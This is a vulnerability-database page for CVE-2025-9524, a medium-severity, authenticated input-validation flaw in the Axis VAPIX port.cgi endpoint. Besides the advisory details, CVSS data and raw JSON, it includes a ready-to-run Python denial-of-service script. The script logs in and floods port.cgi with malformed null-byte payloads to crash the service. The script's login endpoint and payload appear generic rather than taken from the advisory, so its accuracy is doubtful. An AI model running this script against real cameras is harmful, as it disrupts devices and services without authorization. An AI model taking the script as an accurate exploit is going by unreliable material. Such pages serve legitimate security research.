Security Vulnerability Report
中文
CVE-2025-9524 CVSS 4.3 MEDIUM

CVE-2025-9524

Published: 2025-11-11 08:15:35
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The VAPIX API port.cgi did not have sufficient input validation, which may result in process crashes and impact usability. This vulnerability can only be exploited after authenticating with a viewer- operator- or administrator-privileged service account.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

No configuration data available.

Axis摄像头固件(使用VAPIX API且port.cgi存在输入验证缺陷的版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 # CVE-2025-9524 PoC - Axis VAPIX API port.cgi Input Validation Issue # Requires valid credentials (viewer/operator/administrator) import requests import sys import argparse def exploit(target_url, username, password): """ Exploit for CVE-2025-9524 Sends malformed request to VAPIX port.cgi endpoint """ # VAPIX authentication auth_url = f"{target_url}/cgi-bin/login.cgi" auth_data = { "user": username, "password": password } try: # Authenticate session = requests.Session() response = session.post(auth_url, data=auth_data, timeout=10) if response.status_code != 200: print("[-] Authentication failed") return False # Malformed request to port.cgi with invalid parameters exploit_url = f"{target_url}/cgi-bin/port.cgi" headers = { "Content-Type": "application/x-www-form-urlencoded" } # Sending malformed input to trigger validation issue payload = "action=update&port=invalid_input\x00\xfe\x00\n" * 100 response = session.post(exploit_url, data=payload, headers=headers, timeout=10) # Check if process crashed (service unavailable) if response.status_code in [500, 502, 503]: print("[+] Successfully triggered DoS condition") print(f"[+] Response: {response.status_code}") return True else: print("[-] Exploit may not have succeeded") return False except requests.exceptions.RequestException as e: print(f"[-] Request error: {e}") return False if __name__ == "__main__": parser = argparse.ArgumentParser(description="CVE-2025-9524 PoC") parser.add_argument("-t", "--target", required=True, help="Target URL") parser.add_argument("-u", "--username", required=True, help="Username") parser.add_argument("-p", "--password", required=True, help="Password") args = parser.parse_args() print(f"[*] Targeting: {args.target}") print(f"[*] Attempting CVE-2025-9524 exploitation...") exploit(args.target, args.username, args.password)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-9524", "sourceIdentifier": "[email protected]", "published": "2025-11-11T08:15:35.213", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The VAPIX API port.cgi did not have sufficient input validation, which may result in process crashes and impact usability. This vulnerability can only be exploited after authenticating with a viewer- operator- or administrator-privileged service account."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-1287"}]}], "references": [{"url": "https://www.axis.com/dam/public/f1/f0/1e/cve-2025-9524pdf-en-US-504220.pdf", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.